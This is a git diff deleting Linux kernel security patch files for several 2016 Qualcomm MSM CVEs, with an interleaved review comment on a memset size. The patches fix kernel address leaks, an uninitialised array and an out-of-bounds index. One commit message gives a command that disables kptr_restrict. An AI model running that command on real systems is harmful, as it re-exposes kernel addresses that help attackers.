a/Patches/Linux_CVEs/CVE-2016-6749/ANY/0001.patch b/Patches/Linux_CVEs/CVE-2016-6749/ANY/0001.patch deleted file mode 100644 index 0eadbd3e..00000000 --- a/Patches/Linux_CVEs/CVE-2016-6749/ANY/0001.patch +++ /dev/null 
@@ -1,214 +0,0 @@ -From f9185dc83b92e7d1ee341e32e8cf5ed00a7253a7 Mon Sep 17 00:00:00 2001 -From: Divya Ponnusamy -Date: Wed, 24 Aug 2016 17:06:54 +0530 -Subject: msm: kgsl: Change %p to %pK in debug messages - -The format specifier %p can leak kernel addresses -while not valuing the kptr_restrict system settings. -Use %pK instead of %p, which evaluates whether -kptr_restrict is set. - -Change-Id: I0778e43e0a03852ca2944377256a7b401586a747 -Signed-off-by: Divya Ponnusamy ---- - drivers/gpu/msm/adreno_debugfs.c | 4 ++-- - drivers/gpu/msm/kgsl.c | 5 ++--- - drivers/gpu/msm/kgsl_cffdump.c | 9 +-------- - drivers/gpu/msm/kgsl_cmdbatch.c | 4 ++-- - drivers/gpu/msm/kgsl_iommu.c | 19 +++++++++---------- - drivers/gpu/msm/kgsl_pwrctrl.c | 4 ++-- - drivers/gpu/msm/kgsl_snapshot.c | 5 +---- - 7 files changed, 19 insertions(+), 31 deletions(-) - -diff --git a/drivers/gpu/msm/adreno_debugfs.c b/drivers/gpu/msm/adreno_debugfs.c -index 9c045b5..7628285 100644 ---- a/drivers/gpu/msm/adreno_debugfs.c -+++ b/drivers/gpu/msm/adreno_debugfs.c -@@ -1,4 +1,4 @@ --/* Copyright (c) 2002,2008-2015, The Linux Foundation. All rights reserved. -+/* Copyright (c) 2002,2008-2016, The Linux Foundation. All rights reserved. - * - * This program is free software; you can redistribute it and/or modify - * it under the terms of the GNU General Public License version 2 and -@@ -83,7 +83,7 @@ static void sync_event_print(struct seq_file *s, - break; - } - case KGSL_CMD_SYNCPOINT_TYPE_FENCE: -- seq_printf(s, "sync: [%p] %s", sync_event->handle, -+ seq_printf(s, "sync: [%pK] %s", sync_event->handle, - (sync_event->handle && sync_event->handle->fence) - ? 
sync_event->handle->fence->name : "NULL"); - break; -diff --git a/drivers/gpu/msm/kgsl.c b/drivers/gpu/msm/kgsl.c -index 4c3753e..18cc267 100644 ---- a/drivers/gpu/msm/kgsl.c -+++ b/drivers/gpu/msm/kgsl.c -@@ -4131,9 +4131,8 @@ int kgsl_device_platform_probe(struct kgsl_device *device) - disable_irq(device->pwrctrl.interrupt_num); - - KGSL_DRV_INFO(device, -- "dev_id %d regs phys 0x%08lx size 0x%08x virt %p\n", -- device->id, device->reg_phys, device->reg_len, -- device->reg_virt); -+ "dev_id %d regs phys 0x%08lx size 0x%08x\n", -+ device->id, device->reg_phys, device->reg_len); - - rwlock_init(&device->context_lock); - -diff --git a/drivers/gpu/msm/kgsl_cffdump.c b/drivers/gpu/msm/kgsl_cffdump.c -index 1f10a33..67e3d02 100644 ---- a/drivers/gpu/msm/kgsl_cffdump.c -+++ b/drivers/gpu/msm/kgsl_cffdump.c -@@ -1,4 +1,4 @@ --/* Copyright (c) 2010-2015, The Linux Foundation. All rights reserved. -+/* Copyright (c) 2010-2016, The Linux Foundation. All rights reserved. - * - * This program is free software; you can redistribute it and/or modify - * it under the terms of the GNU General Public License version 2 and -@@ -515,10 +515,6 @@ EXPORT_SYMBOL(kgsl_cffdump_waitirq); - static int subbuf_start_handler(struct rchan_buf *buf, - void *subbuf, void *prev_subbuf, size_t prev_padding) - { -- pr_debug("kgsl: cffdump: subbuf_start_handler(subbuf=%p, prev_subbuf" -- "=%p, prev_padding=%08zx)\n", subbuf, prev_subbuf, -- prev_padding); -- - if (relay_buf_full(buf)) { - if (!suspended) { - suspended = 1; -@@ -575,9 +571,6 @@ static struct rchan *create_channel(unsigned subbuf_size, unsigned n_subbufs) - { - struct rchan *chan; - -- pr_info("kgsl: cffdump: relay: create_channel: subbuf_size %u, " -- "n_subbufs %u, dir 0x%p\n", subbuf_size, n_subbufs, dir); -- - chan = relay_open("cpu", dir, subbuf_size, - n_subbufs, &relay_callbacks, NULL); - if (!chan) { -diff --git a/drivers/gpu/msm/kgsl_cmdbatch.c b/drivers/gpu/msm/kgsl_cmdbatch.c -index 46e053f..7dfd691 100644 ---- 
a/drivers/gpu/msm/kgsl_cmdbatch.c -+++ b/drivers/gpu/msm/kgsl_cmdbatch.c -@@ -1,4 +1,4 @@ --/* Copyright (c) 2008-2015, The Linux Foundation. All rights reserved. -+/* Copyright (c) 2008-2016, The Linux Foundation. All rights reserved. - * - * This program is free software; you can redistribute it and/or modify - * it under the terms of the GNU General Public License version 2 and -@@ -92,7 +92,7 @@ void kgsl_dump_syncpoints(struct kgsl_device *device, - } - case KGSL_CMD_SYNCPOINT_TYPE_FENCE: - if (event->handle) -- dev_err(device->dev, " fence: [%p] %s\n", -+ dev_err(device->dev, " fence: [%pK] %s\n", - event->handle->fence, - event->handle->name); - else -diff --git a/drivers/gpu/msm/kgsl_iommu.c b/drivers/gpu/msm/kgsl_iommu.c -index 249df4d..f510ac4 100644 ---- a/drivers/gpu/msm/kgsl_iommu.c -+++ b/drivers/gpu/msm/kgsl_iommu.c -@@ -1,4 +1,4 @@ --/* Copyright (c) 2011-2015, The Linux Foundation. All rights reserved. -+/* Copyright (c) 2011-2016, The Linux Foundation. All rights reserved. 
- * - * This program is free software; you can redistribute it and/or modify - * it under the terms of the GNU General Public License version 2 and -@@ -612,7 +612,7 @@ static void kgsl_detach_pagetable_iommu_domain(struct kgsl_mmu *mmu) - iommu_detach_device(iommu_pt->domain, ctx->dev); - ctx->attached = false; - KGSL_MEM_INFO(mmu->device, -- "iommu %p detached from user dev of MMU: %p\n", -+ "iommu %pK detached from user dev of MMU: %pK\n", - iommu_pt->domain, mmu); - } - } -@@ -700,7 +700,7 @@ static int kgsl_attach_pagetable_iommu_domain(struct kgsl_mmu *mmu) - } - ctx->attached = true; - KGSL_MEM_INFO(mmu->device, -- "iommu pt %p attached to dev %p, ctx_id %d\n", -+ "iommu pt %pK attached to dev %pK, ctx_id %d\n", - iommu_pt->domain, ctx->dev, ctx->ctx_id); - if (KGSL_IOMMU_CONTEXT_SECURE != i) { - ret = iommu_domain_get_attr(iommu_pt->domain, -@@ -1108,8 +1108,8 @@ kgsl_iommu_unmap(struct kgsl_pagetable *pt, - unmapped = iommu_unmap(iommu_pt->domain, gpuaddr, range); - if (unmapped != range) { - KGSL_CORE_ERR( -- "iommu_unmap(%p, %llx, %lld) failed with unmapped size: %zd\n", -- iommu_pt->domain, gpuaddr, range, unmapped); -+ "iommu_unmap(%llx, %lld) failed with unmapped size: %zd\n", -+ gpuaddr, range, unmapped); - return -EINVAL; - } - -@@ -1237,8 +1237,8 @@ int _iommu_add_guard_page(struct kgsl_pagetable *pt, - protflags & ~IOMMU_WRITE); - if (ret) { - KGSL_CORE_ERR( -- "iommu_map(%p, addr %016llX, flags %x) err: %d\n", -- iommu_pt->domain, gpuaddr, protflags & ~IOMMU_WRITE, -+ "iommu_map(addr %016llX, flags %x) err: %d\n", -+ gpuaddr, protflags & ~IOMMU_WRITE, - ret); - return ret; - } -@@ -1306,9 +1306,8 @@ kgsl_iommu_map(struct kgsl_pagetable *pt, - } - - if (mapped != size) { -- KGSL_CORE_ERR("iommu_map_sg(%p, %016llX, %lld, %x) err: %zd\n", -- iommu_pt->domain, addr, size, -- flags, mapped); -+ KGSL_CORE_ERR("iommu_map_sg(%016llX, %lld, %x) err: %zd\n", -+ addr, size, flags, mapped); - return -ENODEV; - } - -diff --git a/drivers/gpu/msm/kgsl_pwrctrl.c 
b/drivers/gpu/msm/kgsl_pwrctrl.c -index 1c89d74..f50e6d7 100644 ---- a/drivers/gpu/msm/kgsl_pwrctrl.c -+++ b/drivers/gpu/msm/kgsl_pwrctrl.c -@@ -1593,7 +1593,7 @@ int kgsl_pwrctrl_init(struct kgsl_device *device) - - if (!pwr->ocmem_pcl) { - KGSL_PWR_ERR(device, -- "msm_bus_scale_register_client failed: id %d table %p", -+ "msm_bus_scale_register_client failed: id %d table %pK", - device->id, ocmem_scale_table); - result = -EINVAL; - goto done; -@@ -1643,7 +1643,7 @@ int kgsl_pwrctrl_init(struct kgsl_device *device) - (pdata->bus_scale_table); - if (!pwr->pcl) { - KGSL_PWR_ERR(device, -- "msm_bus_scale_register_client failed: id %d table %p", -+ "msm_bus_scale_register_client failed: id %d table %pK", - device->id, pdata->bus_scale_table); - result = -EINVAL; - goto done; -diff --git a/drivers/gpu/msm/kgsl_snapshot.c b/drivers/gpu/msm/kgsl_snapshot.c -index 42eabe4..bbfd8a7 100644 ---- a/drivers/gpu/msm/kgsl_snapshot.c -+++ b/drivers/gpu/msm/kgsl_snapshot.c -@@ -1,4 +1,4 @@ --/* Copyright (c) 2012-2015, The Linux Foundation. All rights reserved. -+/* Copyright (c) 2012-2016, The Linux Foundation. All rights reserved. - * - * This program is free software; you can redistribute it and/or modify - * it under the terms of the GNU General Public License version 2 and -@@ -1120,9 +1120,6 @@ void kgsl_snapshot_save_frozen_objs(struct work_struct *work) - goto done; - - snapshot->mempool = vmalloc(size); -- if (snapshot->mempool != NULL) -- KGSL_CORE_ERR("snapshot: mempool address %p, size %zx\n", -- snapshot->mempool, size); - - ptr = snapshot->mempool; - snapshot->mempool_size = 0; --- -cgit v1.1 - diff --git a/Patches/Linux_CVEs/CVE-2016-6750/ANY/0001.patch b/Patches/Linux_CVEs/CVE-2016-6750/ANY/0001.patch deleted file mode 100644 index f492aa47..00000000 --- a/Patches/Linux_CVEs/CVE-2016-6750/ANY/0001.patch +++ /dev/null 
@@ -1,101 +0,0 @@ -From 34bda711a1c7bc7f9fd7bea3a5be439ed00577e5 Mon Sep 17 00:00:00 2001 -From: Karthikeyan Ramasubramanian -Date: Tue, 16 Aug 2016 11:24:00 -0600 -Subject: soc: qcom: smp2p: Fix kernel address leak - -Change format string to %pK instead of %p in the debug statements. This -change fixes kernel address leaks from the usage of %p. - -CRs-Fixed: 1052825 -Change-Id: Ib95f691919a2977f5436cd4c6ac4a002d70dd729 -Signed-off-by: Chris Lew -Signed-off-by: Karthikeyan Ramasubramanian ---- - drivers/gpio/gpio-msm-smp2p.c | 2 +- - drivers/soc/qcom/smp2p.c | 6 +++--- - drivers/soc/qcom/smp2p_debug.c | 4 ++-- - drivers/soc/qcom/smp2p_test_common.h | 5 +++-- - 4 files changed, 9 insertions(+), 8 deletions(-) - -diff --git a/drivers/gpio/gpio-msm-smp2p.c b/drivers/gpio/gpio-msm-smp2p.c -index bde81f0..b426a80 100644 ---- a/drivers/gpio/gpio-msm-smp2p.c -+++ b/drivers/gpio/gpio-msm-smp2p.c -@@ -368,7 +368,7 @@ static int smp2p_irq_map(struct irq_domain *domain_ptr, unsigned int virq, - - chip = domain_ptr->host_data; - if (!chip) { -- SMP2P_ERR("%s: invalid domain ptr %p\n", __func__, domain_ptr); -+ SMP2P_ERR("%s: invalid domain ptr\n", __func__); - return -ENODEV; - } - -diff --git a/drivers/soc/qcom/smp2p.c b/drivers/soc/qcom/smp2p.c -index fc5688b..79b8ffb 100644 ---- a/drivers/soc/qcom/smp2p.c -+++ b/drivers/soc/qcom/smp2p.c -@@ -1,6 +1,6 @@ - /* drivers/soc/qcom/smp2p.c - * -- * Copyright (c) 2013-2015, The Linux Foundation. All rights reserved. -+ * Copyright (c) 2013-2016, The Linux Foundation. All rights reserved. 
- * - * This program is free software; you can redistribute it and/or modify - * it under the terms of the GNU General Public License version 2 and -@@ -519,8 +519,8 @@ static void smp2p_find_entry_v1(struct smp2p_smem __iomem *item, - char entry_name[SMP2P_MAX_ENTRY_NAME]; - - if (!item || !name || !entry_ptr) { -- SMP2P_ERR("%s: invalid arguments %p, %p, %p\n", -- __func__, item, name, entry_ptr); -+ SMP2P_ERR("%s: invalid arguments %d %d %d\n", -+ __func__, !item, !name, !entry_ptr); - return; - } - -diff --git a/drivers/soc/qcom/smp2p_debug.c b/drivers/soc/qcom/smp2p_debug.c -index 4deb05a..8d98d07 100644 ---- a/drivers/soc/qcom/smp2p_debug.c -+++ b/drivers/soc/qcom/smp2p_debug.c -@@ -1,6 +1,6 @@ - /* drivers/soc/qcom/smp2p_debug.c - * -- * Copyright (c) 2013-2014, The Linux Foundation. All rights reserved. -+ * Copyright (c) 2013-2014,2016 The Linux Foundation. All rights reserved. - * - * This program is free software; you can redistribute it and/or modify - * it under the terms of the GNU General Public License version 2 and -@@ -41,7 +41,7 @@ static void smp2p_int_stats(struct seq_file *s) - pid != SMP2P_REMOTE_MOCK_PROC) - continue; - -- seq_printf(s, "| %5s (%d) | %11u | %10u | %10u | %p | %08x |\n", -+ seq_printf(s, "| %5s (%d) | %11u | %10u | %10u | %pK | %08x |\n", - int_cfg[pid].name, - pid, int_cfg[pid].in_int_id, - int_cfg[pid].in_interrupt_count, -diff --git a/drivers/soc/qcom/smp2p_test_common.h b/drivers/soc/qcom/smp2p_test_common.h -index 747a812..3be519b 100644 ---- a/drivers/soc/qcom/smp2p_test_common.h -+++ b/drivers/soc/qcom/smp2p_test_common.h -@@ -1,6 +1,6 @@ - /* drivers/soc/qcom/smp2p_test_common.h - * -- * Copyright (c) 2013-2014, The Linux Foundation. All rights reserved. -+ * Copyright (c) 2013-2014,2016 The Linux Foundation. All rights reserved. 
- * - * This program is free software; you can redistribute it and/or modify - * it under the terms of the GNU General Public License version 2 and -@@ -49,7 +49,8 @@ - void *a_tmp = (a); \ - void *b_tmp = (b); \ - if (!((a_tmp)cmp(b_tmp))) { \ -- seq_printf(s, "%s:%d Fail: " #a "(%p) " #cmp " " #b "(%p)\n", \ -+ seq_printf(s, "%s:%d Fail: " #a "(%pK) " #cmp \ -+ " " #b "(%pK)\n", \ - __func__, __LINE__, \ - a_tmp, b_tmp); \ - failed = 1; \ --- -cgit v1.1 - diff --git a/Patches/Linux_CVEs/CVE-2016-6751/ANY/0001.patch b/Patches/Linux_CVEs/CVE-2016-6751/ANY/0001.patch deleted file mode 100644 index c424fb7e..00000000 --- a/Patches/Linux_CVEs/CVE-2016-6751/ANY/0001.patch +++ /dev/null 
@@ -1,38 +0,0 @@ -From 4907b74ecd5ef8c6d85f1b430f386e381d5b8229 Mon Sep 17 00:00:00 2001 -From: Walter Yang -Date: Wed, 7 Sep 2016 16:28:50 +0800 -Subject: ASoC: msm: initialize the params array before using it - -The params array is used without initialization, which may cause -security issues. Initialize it as all zero after the definition. - -CRs-Fixed: 1062271 -Change-Id: If462fe3d82f139d72547f82dc7eb564f83cb35bf -Signed-off-by: Walter Yang ---- - sound/soc/msm/qdsp6v2/msm-compr-q6-v2.c | 2 ++ - 1 file changed, 2 insertions(+) - -diff --git a/sound/soc/msm/qdsp6v2/msm-compr-q6-v2.c b/sound/soc/msm/qdsp6v2/msm-compr-q6-v2.c -index 26528e6..58a4de5 100644 ---- a/sound/soc/msm/qdsp6v2/msm-compr-q6-v2.c -+++ b/sound/soc/msm/qdsp6v2/msm-compr-q6-v2.c -@@ -1024,6 +1024,7 @@ static int msm_compr_ioctl_shared(struct snd_pcm_substream *substream, - struct snd_dec_ddp *ddp = - &compr->info.codec_param.codec.options.ddp; - uint32_t params_length = 0; -+ memset(params_value, 0, MAX_AC3_PARAM_SIZE); - /* check integer overflow */ - if (ddp->params_length > UINT_MAX/sizeof(int)) { - pr_err("%s: Integer overflow ddp->params_length %d\n", -@@ -1064,6 +1065,7 @@ static int msm_compr_ioctl_shared(struct snd_pcm_substream *substream, - struct snd_dec_ddp *ddp = - &compr->info.codec_param.codec.options.ddp; - uint32_t params_length = 0; -+ memset(params_value, 0, MAX_AC3_PARAM_SIZE); - /* check integer overflow */ - if (ddp->params_length > UINT_MAX/sizeof(int)) { - pr_err("%s: Integer overflow ddp->params_length %d\n", --- -cgit v1.1 - diff --git a/Patches/Linux_CVEs/CVE-2016-6752/ANY/0001.patch b/Patches/Linux_CVEs/CVE-2016-6752/ANY/0001.patch deleted file mode 100644 index fdeef302..00000000 --- a/Patches/Linux_CVEs/CVE-2016-6752/ANY/0001.patch +++ /dev/null 
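Review bot: Both added `memset(params_value, 0, MAX_AC3_PARAM_SIZE);` lines in msm_compr_ioctl_shared (hunks `@@ -1024,6 +1024,7 @@` and `@@ -1064,6 +1065,7 @@`) appear to pass an element count where a byte count is expected. The declaration of `params_value` is outside the hunks, but the overflow check right after divides by `sizeof(int)`, which suggests an int array. If so, only part of the array is cleared and the rest still holds uninitialized stack data, which is the issue the commit message sets out to fix. Assuming it is a local array, `memset(params_value, 0, sizeof(params_value));` clears all of it regardless of element type. A `= {0}` initializer at the declaration would do the same.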
@@ -1,109 +0,0 @@
-From 0de2c7600c8f1f0152a2f421c6593f931186400a Mon Sep 17 00:00:00 2001
-From: Mallikarjuna Reddy Amireddy
-Date: Mon, 25 Jul 2016 18:14:39 +0530
-Subject: qseecom: Change format specifier %p to %pK
-
-Format specifier %p can leak kernel addresses while not valuing the
-kptr_restrict system settings. When kptr_restrict is set to (1), kernel
-pointers printed using the %pK format specifier will be replaced with 0's.
-So that %pK will not leak kernel pointers to unprivileged users.
-So change the format specifier from %p to %pK.
-
-Debugging Note : &pK prints only Zeros as address. if you need actual
-address information, pls echo 0 to kptr_restrict.
-$ echo 0 > /proc/sys/kernel/kptr_restrict
-
-Change-Id: I0baf2be2d5a476e2e4267f20b99d0ddf5492469e
-Signed-off-by: Mallikarjuna Reddy Amireddy
----
- drivers/misc/qseecom.c | 18 +++++++++---------
- 1 file changed, 9 insertions(+), 9 deletions(-)
-
-diff --git a/drivers/misc/qseecom.c b/drivers/misc/qseecom.c
-index 52034c7..4fab447 100644
---- a/drivers/misc/qseecom.c
-+++ b/drivers/misc/qseecom.c
-@@ -1133,7 +1133,7 @@ static int qseecom_set_client_mem_param(struct qseecom_dev_handle *data,
-
- if ((req.ifd_data_fd <= 0) || (req.virt_sb_base == NULL) ||
- (req.sb_len == 0)) {
-- pr_err("Inavlid input(s)ion_fd(%d), sb_len(%d), vaddr(0x%p)\n",
-+ pr_err("Inavlid input(s)ion_fd(%d), sb_len(%d), vaddr(0x%pK)\n",
- req.ifd_data_fd, req.sb_len, req.virt_sb_base);
- return -EFAULT;
- }
-@@ -1653,7 +1653,7 @@ int __qseecom_process_rpmb_svc_cmd(struct qseecom_dev_handle *data_ptr,
- void *req_buf = NULL;
-
- if ((req_ptr == NULL) || (send_svc_ireq_ptr == NULL)) {
-- pr_err("Error with pointer: req_ptr = %p, send_svc_ptr = %p\n",
-+ pr_err("Error with pointer: req_ptr = %pK, send_svc_ptr = %pK\n",
- req_ptr, send_svc_ireq_ptr);
- return -EINVAL;
- }
-@@ -1700,7 +1700,7 @@ int __qseecom_process_fsm_key_svc_cmd(struct qseecom_dev_handle *data_ptr,
- uint32_t reqd_len_sb_in = 0;
-
- if ((req_ptr == NULL) || (send_svc_ireq_ptr == NULL)) {
-- pr_err("Error with pointer: req_ptr = %p, send_svc_ptr = %p\n",
-+ pr_err("Error with pointer: req_ptr = %pK, send_svc_ptr = %pK\n",
- req_ptr, send_svc_ireq_ptr);
- return -EINVAL;
- }
-@@ -3025,7 +3025,7 @@ int qseecom_send_command(struct qseecom_handle *handle, void *send_buf,
- if (ret)
- return ret;
-
-- pr_debug("sending cmd_req->rsp size: %u, ptr: 0x%p\n",
-+ pr_debug("sending cmd_req->rsp size: %u, ptr: 0x%pK\n",
- req.resp_len, req.resp_buf);
- return ret;
- }
-@@ -4844,7 +4844,7 @@ long qseecom_ioctl(struct file *file, unsigned cmd, unsigned long arg)
- ret = -EINVAL;
- break;
- }
-- pr_debug("SET_MEM_PARAM: qseecom addr = 0x%p\n", data);
-+ pr_debug("SET_MEM_PARAM: qseecom addr = 0x%pK\n", data);
- ret = qseecom_set_client_mem_param(data, argp);
- if (ret)
- pr_err("failed Qqseecom_set_mem_param request: %d\n",
-@@ -4860,7 +4860,7 @@ long qseecom_ioctl(struct file *file, unsigned cmd, unsigned long arg)
- break;
- }
- data->type = QSEECOM_CLIENT_APP;
-- pr_debug("LOAD_APP_REQ: qseecom_addr = 0x%p\n", data);
-+ pr_debug("LOAD_APP_REQ: qseecom_addr = 0x%pK\n", data);
- mutex_lock(&app_access_lock);
- atomic_inc(&data->ioctl_count);
- if (qseecom.qsee_version > QSEEE_VERSION_00) {
-@@ -4886,7 +4886,7 @@ long qseecom_ioctl(struct file *file, unsigned cmd, unsigned long arg)
- ret = -EINVAL;
- break;
- }
-- pr_debug("UNLOAD_APP: qseecom_addr = 0x%p\n", data);
-+ pr_debug("UNLOAD_APP: qseecom_addr = 0x%pK\n", data);
- mutex_lock(&app_access_lock);
- atomic_inc(&data->ioctl_count);
- ret = qseecom_unload_app(data, false);
-@@ -5017,7 +5017,7 @@ long qseecom_ioctl(struct file *file, unsigned cmd, unsigned long arg)
- data->type = QSEECOM_CLIENT_APP;
- mutex_lock(&app_access_lock);
- atomic_inc(&data->ioctl_count);
-- pr_debug("APP_LOAD_QUERY: qseecom_addr = 0x%p\n", data);
-+ pr_debug("APP_LOAD_QUERY: qseecom_addr = 0x%pK\n", data);
- ret = qseecom_query_app_loaded(data, argp);
- atomic_dec(&data->ioctl_count);
- mutex_unlock(&app_access_lock);
-@@ -5288,7 +5288,7 @@ static int qseecom_release(struct inode *inode, struct file *file)
- int ret = 0;
-
- if (data->released == false) {
-- pr_debug("data: released=false, type=%d, mode=%d, data=0x%p\n",
-+ pr_debug("data: released=false, type=%d, mode=%d, data=0x%pK\n",
- data->type, data->mode, data);
- switch (data->type) {
- case QSEECOM_LISTENER_SERVICE:
---
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2016-6753/ANY/0001.patch b/Patches/Linux_CVEs/CVE-2016-6753/ANY/0001.patch
deleted file mode 100644
index 94530915..00000000
--- a/Patches/Linux_CVEs/CVE-2016-6753/ANY/0001.patch
+++ /dev/null
@@ -1,32 +0,0 @@
-From 5ee75a32931dc70a7af2be42650ac5f14db99674 Mon Sep 17 00:00:00 2001
-From: Nick Desaulniers
-Date: Mon, 12 Sep 2016 15:47:42 -0700
-Subject: cgroup: prefer %pK to %p
-
-Prevents leaking kernel pointers when using kptr_restrict.
-
-Bug: 30149174
-Change-Id: I0fa3cd8d4a0d9ea76d085bba6020f1eda073c09b
-Git-repo: https://android.googlesource.com/kernel/msm.git
-Git-commit: 505e48f32f1321ed7cf80d49dd5f31b16da445a8
-Signed-off-by: Srinivasa Rao Kuppala
----
- kernel/cgroup.c | 2 +-
- 1 file changed, 1 insertion(+), 1 deletion(-)
-
-diff --git a/kernel/cgroup.c b/kernel/cgroup.c
-index 05b36e7..1e2c358 100644
---- a/kernel/cgroup.c
-+++ b/kernel/cgroup.c
-@@ -5449,7 +5449,7 @@ static int cgroup_css_links_read(struct cgroup *cont,
- struct css_set *cg = link->cg;
- struct task_struct *task;
- int count = 0;
-- seq_printf(seq, "css_set %p\n", cg);
-+ seq_printf(seq, "css_set %pK\n", cg);
- list_for_each_entry(task, &cg->tasks, cg_list) {
- if (count++ > MAX_TASKS_SHOWN_PER_CSS) {
- seq_puts(seq, " ...\n");
---
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2016-6755/3.10/0001.patch b/Patches/Linux_CVEs/CVE-2016-6755/3.10/0001.patch
deleted file mode 100644
index 63320d9e..00000000
--- a/Patches/Linux_CVEs/CVE-2016-6755/3.10/0001.patch
+++ /dev/null
@@ -1,58 +0,0 @@
-From b5df02edbcdf53dbbab77903d28162772edcf6e0 Mon Sep 17 00:00:00 2001
-From: Suman Mukherjee
-Date: Thu, 22 Sep 2016 09:06:48 +0530
-Subject: msm: sensor: validate the i2c table index before use
-
-Verifying the i2c table index value before accessing
-the i2c table to avoid memory corruption issues.
-CRs-Fixed: 1065916
-
-Change-Id: I0e31c22f90006f27a77cd420288334b8355cee95
-Signed-off-by: Sureshnaidu Laveti
-Signed-off-by: Suman Mukherjee
----
- .../platform/msm/camera_v2/sensor/actuator/msm_actuator.c | 14 +++++++++-----
- 1 file changed, 9 insertions(+), 5 deletions(-)
-
-diff --git a/drivers/media/platform/msm/camera_v2/sensor/actuator/msm_actuator.c b/drivers/media/platform/msm/camera_v2/sensor/actuator/msm_actuator.c
-index 1f4eaa1..bebe691 100644
---- a/drivers/media/platform/msm/camera_v2/sensor/actuator/msm_actuator.c
-+++ b/drivers/media/platform/msm/camera_v2/sensor/actuator/msm_actuator.c
-@@ -91,11 +91,6 @@ static void msm_actuator_parse_i2c_params(struct msm_actuator_ctrl_t *a_ctrl,
- struct msm_camera_i2c_reg_array *i2c_tbl = a_ctrl->i2c_reg_tbl;
- CDBG("Enter\n");
- for (i = 0; i < size; i++) {
-- /* check that the index into i2c_tbl cannot grow larger that
-- the allocated size of i2c_tbl */
-- if ((a_ctrl->total_steps + 1) < (a_ctrl->i2c_tbl_index)) {
-- break;
-- }
- if (write_arr[i].reg_write_type == MSM_ACTUATOR_WRITE_DAC) {
- value = (next_lens_position <<
- write_arr[i].data_shift) |
-@@ -109,6 +104,11 @@ static void msm_actuator_parse_i2c_params(struct msm_actuator_ctrl_t *a_ctrl,
- i2c_byte2 = value & 0xFF;
- CDBG("byte1:0x%x, byte2:0x%x\n",
- i2c_byte1, i2c_byte2);
-+ if (a_ctrl->i2c_tbl_index >
-+ a_ctrl->total_steps) {
-+ pr_err("failed:i2c table index out of bound\n");
-+ break;
-+ }
- i2c_tbl[a_ctrl->i2c_tbl_index].
- reg_addr = i2c_byte1;
- i2c_tbl[a_ctrl->i2c_tbl_index].
-@@ -129,6 +129,10 @@ static void msm_actuator_parse_i2c_params(struct msm_actuator_ctrl_t *a_ctrl,
- i2c_byte2 = (hw_dword & write_arr[i].hw_mask) >>
- write_arr[i].hw_shift;
- }
-+ if (a_ctrl->i2c_tbl_index > a_ctrl->total_steps) {
-+ pr_err("failed: i2c table index out of bound\n");
-+ break;
-+ }
- CDBG("i2c_byte1:0x%x, i2c_byte2:0x%x\n", i2c_byte1, i2c_byte2);
- i2c_tbl[a_ctrl->i2c_tbl_index].reg_addr = i2c_byte1;
- i2c_tbl[a_ctrl->i2c_tbl_index].reg_data = i2c_byte2;
---
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2016-6755/3.18/0002.patch b/Patches/Linux_CVEs/CVE-2016-6755/3.18/0002.patch
deleted file mode 100644
index d6da36b4..00000000
--- a/Patches/Linux_CVEs/CVE-2016-6755/3.18/0002.patch
+++ /dev/null
@@ -1,57 +0,0 @@
-From 652c8005752b28c22107e928c28aabce1dfdde84 Mon Sep 17 00:00:00 2001
-From: Sureshnaidu Laveti
-Date: Wed, 14 Sep 2016 07:03:44 -0700
-Subject: msm: sensor: validate the i2c table index before use
-
-Verifying the i2c table index value before accessing
-the i2c table to avoid memory corruption issues.
-
-CRs-Fixed: 1065916
-Change-Id: I0e31c22f90006f27a77cd420288334b8355cee95
-Signed-off-by: Sureshnaidu Laveti
----
- .../platform/msm/camera_v2/sensor/actuator/msm_actuator.c | 14 +++++++++-----
- 1 file changed, 9 insertions(+), 5 deletions(-)
-
-diff --git a/drivers/media/platform/msm/camera_v2/sensor/actuator/msm_actuator.c b/drivers/media/platform/msm/camera_v2/sensor/actuator/msm_actuator.c
-index 0b3e4e1..bf39738 100644
---- a/drivers/media/platform/msm/camera_v2/sensor/actuator/msm_actuator.c
-+++ b/drivers/media/platform/msm/camera_v2/sensor/actuator/msm_actuator.c
-@@ -101,11 +101,6 @@ static void msm_actuator_parse_i2c_params(struct msm_actuator_ctrl_t *a_ctrl,
- i2c_tbl = a_ctrl->i2c_reg_tbl;
-
- for (i = 0; i < size; i++) {
-- /* check that the index into i2c_tbl cannot grow larger that
-- the allocated size of i2c_tbl */
-- if ((a_ctrl->total_steps + 1) < (a_ctrl->i2c_tbl_index))
-- break;
--
- if (write_arr[i].reg_write_type == MSM_ACTUATOR_WRITE_DAC) {
- value = (next_lens_position <<
- write_arr[i].data_shift) |
-@@ -119,6 +114,11 @@ static void msm_actuator_parse_i2c_params(struct msm_actuator_ctrl_t *a_ctrl,
- i2c_byte2 = value & 0xFF;
- CDBG("byte1:0x%x, byte2:0x%x\n",
- i2c_byte1, i2c_byte2);
-+ if (a_ctrl->i2c_tbl_index >
-+ a_ctrl->total_steps) {
-+ pr_err("failed:i2c table index out of bound\n");
-+ break;
-+ }
- i2c_tbl[a_ctrl->i2c_tbl_index].
- reg_addr = i2c_byte1;
- i2c_tbl[a_ctrl->i2c_tbl_index].
-@@ -139,6 +139,10 @@ static void msm_actuator_parse_i2c_params(struct msm_actuator_ctrl_t *a_ctrl,
- i2c_byte2 = (hw_dword & write_arr[i].hw_mask) >>
- write_arr[i].hw_shift;
- }
-+ if (a_ctrl->i2c_tbl_index > a_ctrl->total_steps) {
-+ pr_err("failed: i2c table index out of bound\n");
-+ break;
-+ }
- CDBG("i2c_byte1:0x%x, i2c_byte2:0x%x\n", i2c_byte1, i2c_byte2);
- i2c_tbl[a_ctrl->i2c_tbl_index].reg_addr = i2c_byte1;
- i2c_tbl[a_ctrl->i2c_tbl_index].reg_data = i2c_byte2;
---
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2016-6756/3.10/0001.patch b/Patches/Linux_CVEs/CVE-2016-6756/3.10/0001.patch
deleted file mode 100644
index c1d409fc..00000000
--- a/Patches/Linux_CVEs/CVE-2016-6756/3.10/0001.patch
+++ /dev/null
@@ -1,53 +0,0 @@
-From f91d28dcba304c9f3af35b5bebaa26233c8c13a5 Mon Sep 17 00:00:00 2001
-From: Suman Mukherjee
-Date: Thu, 29 Sep 2016 09:19:05 +0530
-Subject: msm: camera: cpp: Add validation for v4l2 ioctl arguments
-
-In CPP v4l2 ioctl command is made, if _IOC_DIR(cmd) is
-_IOC_NONE, then the user-supplied argument arg is not checked
